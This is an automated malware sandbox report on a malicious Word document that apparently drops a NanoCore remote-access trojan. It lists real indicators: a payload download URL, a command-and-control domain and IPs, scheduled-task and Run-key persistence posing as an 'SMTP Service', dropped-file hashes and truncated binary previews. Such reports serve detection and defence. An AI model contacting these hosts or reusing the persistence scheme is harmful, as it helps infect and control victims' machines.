      9.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.2.RegSvcs.exe.5a0000.2.unpack100%AviraTR/NanoCore.fadteDownload File
      9.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      9.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://paxz.tk/plugmanzx.exe100%Avira URL Cloudmalware
      vijayikohli1.bounceme.net0%Avira URL Cloudsafe
      127.0.0.10%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      paxz.tk
      		2.58.149.41
      		truetrue
        		unknown
        vijayikohli1.bounceme.net
        		103.153.78.234
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://paxz.tk/plugmanzx.exetrue
          • Avira URL Cloud: malware
          		unknown
          4,0,419161966,0000000000099000,00000104,00000010,00020000,00000000,1,0true
            		low
            vijayikohli1.bounceme.nettrue
            • Avira URL Cloud: safe
            		unknown
            127.0.0.1true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://google.comRegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameplugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                103.153.78.234
                		vijayikohli1.bounceme.netunknown
                		134687TWIDC-AS-APTWIDCLimitedHKtrue
                2.58.149.41
                		paxz.tkNetherlands
                		395800GBTCLOUDUStrue

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:558855
                Start date:24.01.2022
                Start time:15:30:23
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 12m 48s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:DOC_MDR0307_019.doc
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.expl.evad.winDOC@20/21@14/2
                EGA Information:
                • Successful, ratio: 80%
                HDC Information:
                • Successful, ratio: 3.9% (good quality ratio 3.5%)
                • Quality average: 81.4%
                • Quality standard deviation: 34.3%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .doc
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                • TCP Packets have been reduced to 100
                • Execution Graph export aborted for target smtpsvc.exe, PID 2284 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: DOC_MDR0307_019.doc

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:30:23API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                15:30:25API Interceptor51x Sleep call for process: plugmancdht5461.exe modified
                15:30:28API Interceptor4x Sleep call for process: schtasks.exe modified
                15:30:28API Interceptor11x Sleep call for process: powershell.exe modified
                15:30:30API Interceptor1433x Sleep call for process: RegSvcs.exe modified
                15:30:35Task SchedulerRun new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" s>$(Arg0)
                15:30:36API Interceptor327x Sleep call for process: taskeng.exe modified
                15:30:36AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                15:30:37Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
                15:30:38API Interceptor4x Sleep call for process: smtpsvc.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\SMTP Service\smtpsvc.exe

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):45216
                Entropy (8bit):6.136703067968073
                Encrypted:false
                SSDEEP:768:Vjs96lj/cps+zk2d0suWB6Iq8NbeYjiwMEBQwp:VAhRzdd0sHI+eYfMEBHp
                MD5:62CE5EF995FD63A1847A196C2E8B267B
                SHA1:114706D7E56E91685042430F783AE227866AA77F
                SHA-256:89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
                SHA-512:ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
                Malicious:false
                Antivirus:
                • Antivirus: Metadefender, Detection: 0%, Browse
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t......*..0..(....... ....s#........o$....X..(....-..*.o%...*.0...........(&......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

                Download File
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:downloaded
                Size (bytes):473088
                Entropy (8bit):7.83796766223819
                Encrypted:false
                SSDEEP:12288:d3jmSsNIXVfqxWnvkrWOzAG30uYs8VGriQ:dySsNFcGzkJV
                MD5:7031570AA150B893F68A32900327B2AE
                SHA1:CAEB6580B9D33EEDEA97C7775AD0853A33A59B3A
                SHA-256:F515A9D2910DA428D7803AFC2244476A5B185F30361482CC1DD49670513281A5
                SHA-512:CFA535B9A5931D41E2177447D6A255ACFB97BA4A0672A776CD6B741515DD9F473CD834A8E119BD096934B954590A2368EECF62A1953C77A5DF7B8AB8152A8773
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 40%
                IE Cache URL:http://paxz.tk/plugmanzx.exe
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.a..............0..,...........J... ...`....@.. ....................................@.................................<J..O....`.. ............................................................................ ............... ..H............text....*... ...,.................. ..`.rsrc... ....`......................@..@.reloc...............6..............@..B................pJ......H.......`..........0...(...8............................................................................0..........*....0...........{....*..0............}....*.0..N........ =.G. ....a%..^E....'...............+%.{...... .*.Z ....a+.. ..T.Z ....a+..*...0..;........ TQs. c]i.a%..^E................+..{...... v._.Z w...a+..*..0.............}....*....0..;.........{..... .. .GJ.a%..^E................+.. x~..Z ...a+..*..0............}......}.....(!... ..$. .1.Wa%...^E....-......

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):225280
                Entropy (8bit):7.977458406087125
                Encrypted:false
                SSDEEP:6144:GKapIaW6DbWT0alL+POEDGP/pmR+nSgPTCpg6:GKapIoDb2ehOl
                MD5:9D7C0E1AB35845B41EAA2E647E3304B3
                SHA1:3366137596EA189EE13AEA3A6675402F7C225E71
                SHA-256:57620EFF414EAC67B3BE86E03CD151AAB2EE129DD469BE32625540B99EC3659D
                SHA-512:F728D58AF400A99FDFF34D0D58EBA8CA73B4C25CE325C10C3EB217EAC1481C8B407F9D324B444C6A7AB781B83F015FD44DFDD274ED65217EA75D2B2F19A31384
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98065E3E-C6B7-49AF-9D9F-8AB4FD115355}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):12800
                Entropy (8bit):3.6171441415563126
                Encrypted:false
                SSDEEP:384:nzU4Brwnh+AxLae3HZ/fQscNpPfwJW6B8WZ:Y4dwkAdTHZZqpP8V8WZ
                MD5:99C092D6432777075332EEEED24D7924
                SHA1:520FC60D469B02390E4CBB944D405258A99DE14C
                SHA-256:A9A6A35010D4701CB25C9231A0D27E193FC2D84F2CF3F4E12361E75F1134F604
                SHA-512:9864694E457887CAA5200B20FC9EC6743D00E6596DD5F55C1F0A31566B0AFC9802803786955476E389EF12118F32F81E821D4B3FEA069A7A8C8872D80822FB18
                Malicious:false
                Preview:@.].'.?./.5.7._.4...(.@.?.9.!.3...=.3.$.3.?.<.%.?.6.0.-.'.3.+.@.3...5./.>.?.(.?.(.,.=.?.5.3.&.!.2...6.$.?.?.!.:.`.(.=.@.2.~.=.>.+.(.[.|.8.>.?...%.<.|.2.?.?.>.<.%.+.3.:.].+.%.?.|._./.).@...&.:.?.0.4.$.<.3.).]...<.6.?.%.&..._.?.,...*.@.?.:.,.:.4.%.?.1.#.?.7.6.:.?.^.>.?.^.%.].>.,.?.%.`.2.].`.2.7.<.~.?.|.%.?.^.%.|...0.>.%.!.2.^.8.^.(.!.&.6._.#.?.`.^./.?.5.).5.@.*.;.7.@.`.'.:.:.:.<...1.[...~.?.,.~.;.=.:.8.~.9.`.?.#.|.$.^.?...%.....!.'.'.>.*.?.?.?.$.2.8.^.6.9.?.?.?.3.-.(.%.^.$...+.].@...6._.`.3.@.?.;.4.4.(...^.].(.%.6.-.[.~.4.$.1.$.!.6.6.,.0.?...@.?.8.,.`.`.$.1.&.0./.?.^.].-.1.[.?...>.$.<.*.;...@.2.!.?.0.4.(.:...~.?.@._.(.$.>.&.~.^.?...[.3.$.^...~...3...?.7.+.....~.$.1.].-.+...?.?.'.?.].=.8.).@.-.1.~.2.?.+.&.?./.?.2.*.7.;.`.$.=.!.).<.?.~.9.4.).&.&.@.+.[.?.#.?.3.?.5.(.1.=.?...?.%.'.-.1.^.%.'.#.-.?.;.?...-.:.^.:.~.*.5.=.].?.>.[.-./.@.<.6.'.!.[.(.;.-.!.!.7.9...].)._.^.%.3.1./.5.!.;.!.?.-.`.+.5.$.*.+.[.).2.2.7.!.4.@.#.-.%.2...&.:.,.0.,.^.&.&.%.@.<.:.&.1.6.~.:.+.(.>.?.<.8.3.7.-.<.#.~.#._.*.9.?.$.

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA9EF1E3-15A6-45BA-9A80-F6F38BA9CAD0}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\tmp41F1.tmp

                Download File
                Process:C:\Users\user\AppData\Roaming\plugmancdht5461.exe
                File Type:XML 1.0 document, ASCII text
                Category:dropped
                Size (bytes):1574
                Entropy (8bit):5.110571978917777
                Encrypted:false
                SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTmv
                MD5:5BBD408E3FC2C0D9EB3F4633FBB0D305
                SHA1:CC6CAC694FC188032DCA5D8543005FE555D0C475
                SHA-256:D143874E6577C7C708B7A0C9353049D101B7EA462D53C0E8025D7E6812AEDEB1
                SHA-512:ECE97D5D428C47BA3C7D728C480B5DA90EEECA457D0554E50F9D9A841F254658C5582FDBDE56D93B260FB2E081A535774761A7B9CE2155D1F2D26A9220BF35DF
                Malicious:true
                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1310
                Entropy (8bit):5.1063907901076036
                Encrypted:false
                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1320
                Entropy (8bit):5.135668813522653
                Encrypted:false
                SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mXxtn:cbk4oL600QydbQxIYODOLedq3ZXj
                MD5:8CAD1B41587CED0F1E74396794F31D58
                SHA1:11054BF74FCF5E8E412768035E4DAE43AA7B710F
                SHA-256:3086D914F6B23268F8A12CB1A05516CD5465C2577E1D1E449F1B45C8E5E8F83C
                SHA-512:99C2EF89029DE51A866DF932841684B7FC912DF21E10E2DD0D09E400203BBDC6CBA6319A31780B7BF8B286D2CEA8EA3FC7D084348BF2F002AB4F5A34218CCBEF
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:data
                Category:dropped
                Size (bytes):232
                Entropy (8bit):7.024371743172393
                Encrypted:false
                SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                MD5:32D0AAE13696FF7F8AF33B2D22451028
                SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                Malicious:false
                Preview:Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.

                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:Non-ISO extended-ASCII text, with no line terminators
                Category:dropped
                Size (bytes):8
                Entropy (8bit):3.0
                Encrypted:false
                SSDEEP:3:omLt:o+
                MD5:542D3B9B452EE0E3A8118D7F9AF5157A
                SHA1:E54E209FD181D854CC911008A117F790449442B6
                SHA-256:18FB4B31D80558259256294FDBC1F15609946DE54BBA333AE99A7840DB9A0FEE
                SHA-512:C4009ED3121539FD5696B97F885DDA187AEC80369E6B8BC9799D78E668D8DD25BFADF639CC50BECBE1140E614FE6781CDCE2D89E8133E9CCA83DE11B134B1162
                Malicious:true
                Preview:..C....H

                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:data
                Category:dropped
                Size (bytes):40
                Entropy (8bit):5.221928094887364
                Encrypted:false
                SSDEEP:3:9bzY6oRDMjmPl:RzWDMCd
                MD5:AE0F5E6CE7122AF264EC533C6B15A27B
                SHA1:1265A495C42EED76CC043D50C60C23297E76CCE1
                SHA-256:73B0B92179C61C26589B47E9732CE418B07EDEE3860EE5A2A5FB06F3B8AA9B26
                SHA-512:DD44C2D24D4E3A0F0B988AD3D04683B5CB128298043134649BBE33B2512CE0C9B1A8E7D893B9F66FBBCDD901E2B0646C4533FB6C0C8C4AFCB95A0EFB95D446F8
                Malicious:false
                Preview:9iH...}Z.4..f..... 8.j....|.&X..e.F.*.

                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:data
                Category:dropped
                Size (bytes):327432
                Entropy (8bit):7.99938831605763
                Encrypted:true
                SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                Malicious:false
                Preview:pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7

                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):57
                Entropy (8bit):4.830795005765378
                Encrypted:false
                SSDEEP:3:oMty8WddSWA1KMNn:oMLW6WA1j
                MD5:08E799E8E9B4FDA648F2500A40A11933
                SHA1:AC76B5E20DED247803448A2F586731ED7D84B9F3
                SHA-256:D46E34924067EB071D1F031C0BC015F4B711EDCE64D8AE00F24F29E73ECB71DB
                SHA-512:5C5701A86156D573BE274E73615FD6236AC89630714863A4CB2639EEC8EC1BE746839EBF8A9AEBA0A9BE326AF6FA02D8F9BD7A93D3FFB139BADE945572DF5FE9
                Malicious:false
                Preview:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DOC_MDR0307_019.LNK

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Mon Jan 24 22:30:17 2022, length=445364, window=hide
                Category:dropped
                Size (bytes):1039
                Entropy (8bit):4.545917285062086
                Encrypted:false
                SSDEEP:12:8TF4jKpRgXg/XAlCPCHaXeBhB/OW9qX+WgxGVQPWZmCicvbp8xZ0DtZ3YilMMEp3:8Tqj4n/XTuzLI3VQ+EJeKmDv3qKQd7Qy
                MD5:85942D0874A1632AD3AC10A95A454183
                SHA1:37871AEA65601BB8E771CF5264659A1E221DD249
                SHA-256:3099E6796E60000F9D23BAA443B225CCFFE3BB9730AB8EF0C4B0F78229E59DEE
                SHA-512:0ADBD50A41DEB54A9256531721B4011D1FFF9296E2E6C825C1F20CA63A8F627603E25F17B4878B2B4A993161B22A620BF1517320994F75DA0773A51F9AA893C5
                Malicious:false
                Preview:L..................F.... .....O?.....O?......Xz................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....8T. .DOC_MD~1.DOC..T.......S...S..*.........................D.O.C._.M.D.R.0.3.0.7._.0.1.9...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\783875\Users.user\Desktop\DOC_MDR0307_019.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.O.C._.M.D.R.0.3.0.7._.0.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......783875..........D_....3N...W...9..g..........

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):81
                Entropy (8bit):4.805554558750854
                Encrypted:false
                SSDEEP:3:bDuMJl5d9lSp3omX18KlSp3ov:bCyQ3E73y
                MD5:42F62869CC0695734C9F7A63B7D91AEC
                SHA1:E974A93DEDBCA09C040C178A6E28608C358694FD
                SHA-256:A32B8F0C13661B05FE0ACAF837E41434C95355C741C4C78C96203BB9539BA3B2
                SHA-512:6926A5B5588A1E0232D0E975E1F362CEEEE44911ED054D29CAFE1B6C0E0420CFEFC4366C8E7E170468217E1E981880C8E421B0DC28460CD76596997DF10E0D39
                Malicious:false
                Preview:[folders]..Templates.LNK=0..DOC_MDR0307_019.LNK=0..[doc]..DOC_MDR0307_019.LNK=0..

                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.5038355507075254
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

